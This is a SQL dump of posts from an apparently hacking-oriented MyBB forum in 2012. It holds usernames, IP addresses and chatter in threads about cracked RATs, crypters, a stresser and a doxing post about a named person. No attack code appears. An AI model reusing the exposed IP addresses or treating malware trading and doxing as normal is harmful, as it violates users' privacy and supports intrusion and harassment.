`mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5768', '910', '5021', '49', 'RE: Referral Contest?', '0', '62', 'R?????zo?', '1350755850', 'what are those ideas? hope you enjoy\'ed your breakfast :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a9b8fe88ae3b502f7f0fdbb57d62ff4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5769', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '228', 'VirtualLegend', '1350755897', '??????????? ???? ??? ??? ????? ??? ??????', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '55cad185c38b00b045e6b4a245efa0bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5770', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '2', 'Apathy', '1350756859', 'We had awards but the plugin got fucked up. We are working on it.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '6722b04fbcbfc489ca2277969a2d23d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5771', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '2', 'Apathy', '1350756964', 'I might try this. Thanks man.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '4d5ce2cbdab24c6b0440827a6fa4e9af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5772', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '61', 'NXK', '1350757014', 'That picture at the end made me Laugh aha. Thank for everything.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a505ed0450e6aff626772ca43c8cfdd2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5773', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '222', 'Exposé', '1350757024', 'I think the awards plugin would be nice idk...', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'a953c12de55b881316c4a77e940b7e97', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5774', '1014', '5770', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '1', 't3h jok3r', '1350757382', '[quote=\'Apathy\' pid=\'5770\' dateline=\'1350756859\'] We had awards but the plugin got fucked up. We are working on it. [/quote] There are two award plugins, myawards which we had and myachievements which we didn\'t use yet but it\'s similar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5c0b2d293c82f2fc9ce94150325744a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5775', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '53', 'sirchamp', '1350757415', 'Achievement for the Win :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'dae5d07ed9e7590d1ac2b9470d2e4d1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5776', '906', '5723', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350757732', '[quote=\'Apathy\' pid=\'5723\' dateline=\'1350747148\'] Why do you guys bother so much? She sleept with a man who was dating someone else. Not cool. [/quote] She was lonely she got a new friend so she didn\'t want to leave him.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8dcee3c854c78b617b17cb158cab27c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5777', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '61', 'NXK', '1350757957', 'It seems pretty nice, The surverys are really unfortunate though.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '26a9c5b418c9ecdf2acad79493acd9a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5778', '2', '4', '34', 'RE: Userbar tut', '0', '228', 'VirtualLegend', '1350758070', 'Awesome Tutorial, I\'m planning to make a group on LH', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '736cacaffcb39c617859dcb0cb3ba0fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5779', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '1', 't3h jok3r', '1350758114', 'No problem guys. [quote=\'iTzIpod\' pid=\'5766\' dateline=\'1350755615\'] [10/19/2012 9:59:50 PM] The Anarchist | AF: Hey, we cancelled our op on LH. [10/19/2012 10:00:06 PM] The Anarchist | AF: Reason being, they aren\'t worth our time. Sorry if you\'re disappointed. [10/19/2012 10:00:56 PM] The Anarchist | AF: We\'d love to have you on the site, but we\'re no longer seeking revenge. [10/19/2012 10:01:17 PM] | The Anarchist | AF: We\'ve had 100+ posts just today, and I think we should focus our efforts on our site, and not theirs. [10/19/2012 10:01:37 PM] The Anarchist | AF: We could easily take them down eventually, but I think it\'d be more beneficial to work on our site. [/quote] They couldn\'t do anything for 2 weeks so I believe they can\'t do anything.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '91bba0a3f799642ed94049870f8c1430', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5780', '1001', '5660', '7', 'RE: Shady URL', '0', '61', 'NXK', '1350758165', 'I miss doing this to people on facebook, Ahha.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '91331c35f932dfbe7f4e5f714630e901', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5781', '945', '5288', '7', 'RE: I dont want.......', '0', '67', 'HoverCatz', '1350758187', 'Leechers can still pm them and share it on other pages.. -.-', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'f1de79081030644b140a62f23257f477', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5782', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '62', 'R?????zo?', '1350758226', 'Your welcome bro :) Love to contribute :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9d9734cca3f148b14b504fb15328ee4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5783', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '62', 'R?????zo?', '1350758379', 'Poor kids, they must try harder :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ddbdcfa9b10aefdb9519f07669517f48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5784', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '222', 'Exposé', '1350758427', 'Lmao AF are getting so desperate....what are they gonna do next', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'a8b36b271b8312e914abf99c48f66941', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5785', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '1', 't3h jok3r', '1350759665', 'Why is this thread closed?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b183d6189cbad16663dccc35c71d9fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5786', '945', '5781', '7', 'RE: I dont want.......', '0', '1', 't3h jok3r', '1350760291', '[quote=\'HoverCatz\' pid=\'5781\' dateline=\'1350758187\'] Leechers can still pm them and share it on other pages.. -.- [/quote] True but I log all PMs and check all the suspicious ones. So when they do it I ban them and send a DMCA notice.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c1d0b30bb8ccf827c8439db062e3fbc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5787', '906', '5776', '42', 'RE: DOX of Kody Maxson', '0', '2', 'Apathy', '1350762622', '[quote=\'t3h jok3r\' pid=\'5776\' dateline=\'1350757732\'] [quote=\'Apathy\' pid=\'5723\' dateline=\'1350747148\'] Why do you guys bother so much? She sleept with a man who was dating someone else. Not cool. [/quote] She was lonely she got a new friend so she didn\'t want to leave him. [/quote] I understand that. I feel for her but she should have thought of the consequences. (not the suicide but that people would be mad at her)', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '4c74c64fe367d8e8e5f2a3b13224ee06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5788', '945', '5288', '7', 'RE: I dont want.......', '0', '3', '??????????¢™', '1350763250', 'Its going to be post and PM for a while or Post here and I pm you.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '21e80e553406d989d3d01287972627b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5789', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '3', '??????????¢™', '1350763410', 'I was the one that showed that screenshotted that pic at the end. LOL', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '8b682b478d37ca1cffade952bef55d15', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5790', '1001', '5660', '7', 'RE: Shady URL', '0', '3', '??????????¢™', '1350763482', 'LMAO I just did that to my friend and he thought I was sending him some porn.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'd1a99bcbd53d5c6e7b9153420998dd8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5791', '1015', '0', '7', 'Grounded', '0', '214', 'Rave™', '1350766905', 'So, heres the story. I was at paintball and my and my bros ran out of paintballs. I stole 2000. $50 value Now I\'m grounded Sorry for the inactivity!', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '21037008387e7bb53a89fba726572e1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5792', '1001', '5660', '7', 'RE: Shady URL', '0', '228', 'VirtualLegend', '1350766987', 'Lmao Send it to my Friends', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a0583d42e59be5908ad2b806fa63308d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5793', '1015', '5791', '7', 'RE: Grounded', '0', '61', 'NXK', '1350767488', 'Damn people still get grounded? This is 2012!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd0b28ad22d5b049b5d6e2a64e3dd0e99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5794', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '61', 'NXK', '1350767565', 'Some leecher probably stole them, Ill check my accounts that i have if they\'re still working and Ill replace them for you.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '918288217a1a2acc9d2a67b20fc9fdfa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5795', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1350767750', 'Cool pic of a new game I play', '99.253.94.204', '1677549260', '1', '0', '61', '1350767833', '1', '19c25730354d6a22f1a06839cc4ddebc', '0', '1350767833'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5796', '1015', '5791', '7', 'RE: Grounded', '0', '2', 'Apathy', '1350767970', 'Kasual. :o Already knew this.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'b2a673d18b8b2128a4c2988c10929a5c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5797', '1015', '5791', '7', 'RE: Grounded', '0', '228', 'VirtualLegend', '1350770034', 'Lol Justice :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '33b4b32aa371924e4d26bd11a890fce5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5798', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '228', 'VirtualLegend', '1350770295', 'I agree with ??????????¢™', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '494f0637a177e944e1bd81a997f488e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5799', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '228', 'VirtualLegend', '1350770610', 'First it worked for me because i was one of the first people that have seen the thread, but i didn\'t changed anything. I logged in with the first account and played like 10min. It was very nice of Treyz to share his MC accounts, but you need to know that you can\'t trust everyone on the forum.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'bec1a53e5d3dba09bb0bfac6d48816f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5800', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '228', 'VirtualLegend', '1350770727', 'Have you ever thought to make money designing graphics ? Cuz your pretty damn good at it', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f3c426716af37e095a68aceb0891f213', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5801', '949', '5339', '72', 'RE: mw3 hack', '0', '228', 'VirtualLegend', '1350770820', 'You know it is possible to post the hole video on the thread?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '17789d4f638fed48e9f42dddadc90dd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5802', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '205', 'mothered', '1350770891', 'Congratz to both members on their new roles. Thanks for all the updates, we should now be well-Informed.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '2e5b3f35f4b8d1d7883ec7f157740dab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5803', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '228', 'VirtualLegend', '1350770913', 'Thanks for the tutorial. I Think i need it in the future, to make a LH MC server :p', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2e743c13ed7db655f131ef27b6a8ede4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5804', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '228', 'VirtualLegend', '1350770993', 'I like the androids, But the IOS are good too :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7d120a951c875efb94a9991049e9f673', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5805', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '228', 'VirtualLegend', '1350771310', 'Congratz Guys I hope that you will bring this forum to the top', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e9abd023d2bd76a9e8559fa3bc2694b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5806', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '205', 'mothered', '1350771623', 'You\'re certainly very active, that\'s for sure. Nice, yes I have to agree. Helpful, well, I haven\'t seen much of that.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '26589a475e67cb38cf5303328c78e3bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5807', '1015', '5791', '7', 'RE: Grounded', '0', '205', 'mothered', '1350771760', 'Thank god I\'m an adult, and make my own decisions. It would suck being grounded. I can\'t stay offline for even 10 minutes, I\'d go nuts.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'be92fde83d67d35e095894d71d62b91f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5808', '1001', '5690', '7', 'RE: Shady URL', '0', '205', 'mothered', '1350771927', '[quote=\'XTr3ME PiX3L\' pid=\'5690\' dateline=\'1350724696\'] Credits go to Greed aka Ryuniz on UB for sharing this , You need to add credits NOW [/quote] As mentioned In my Initial post: \"I came across this on another forum, so I don\'t take credit In finding It myself.\" On topic, glad you all like It :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '43226bda250dac221f8ef19cd648b102', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5809', '1016', '0', '7', 'Flying Steps', '0', '205', 'mothered', '1350772539', 'Greetz everyone, Checkout the video clip of a dance crew named [b]Flying Steps[/b]. I don\'t believe anyone comes close to them. It\'s only just over 2 minutes, so watch the whole lot. Pay particular attention to the guy at the \"1:15 minute mark\". [video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=MlGMoDSPXKA [/video]', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'c8e4f6c72089c93590fd7f87e779a8e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5810', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '205', 'mothered', '1350772751', 'I\'ll certainly allocate some time to watch this. Thanks, appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6e5e50864b2b7e00cc37be391a0b1272', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5811', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '228', 'VirtualLegend', '1350773628', 'Thanks for the great share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7eb32ecea7354a946a82d07911156bdd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5812', '989', '5544', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '228', 'VirtualLegend', '1350773734', 'Already knew this, but thanks for the share bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b9c99b0260662a60aae10a276fea19a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5813', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '228', 'VirtualLegend', '1350774003', 'This is really Amazing, Make more of these !!! And can you also do this with Dell or Microsoft, If you can show on a thread how Keep it up', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd365e8eae9035876ade46a96046e01f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5814', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '228', 'VirtualLegend', '1350774119', 'Looks really great, Gonna check it out later', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '3c11e6bfffe4af19bed995a9aa2b180c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5815', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '228', 'VirtualLegend', '1350774219', 'This looks really Awesome, but is it still FUD ?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6a038e3362a7e19d7494db0d4191d4d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5816', '956', '5385', '75', 'RE: Halo tips,tricks and cheats :O', '0', '228', 'VirtualLegend', '1350774318', 'My opinion: Make your threads more colourful', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6229bc4b7298709ff7e1c41205c42182', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5817', '1000', '5805', '3', 'RE: Congrats NXK and ??????????¢™', '0', '61', 'NXK', '1350774873', '[quote=\'VirtualLegend\' pid=\'5805\' dateline=\'1350771310\'] Congratz Guys I hope that you will bring this forum to the top [/quote] I will try my best.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1f0251532d391397357c92db6011a6cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, 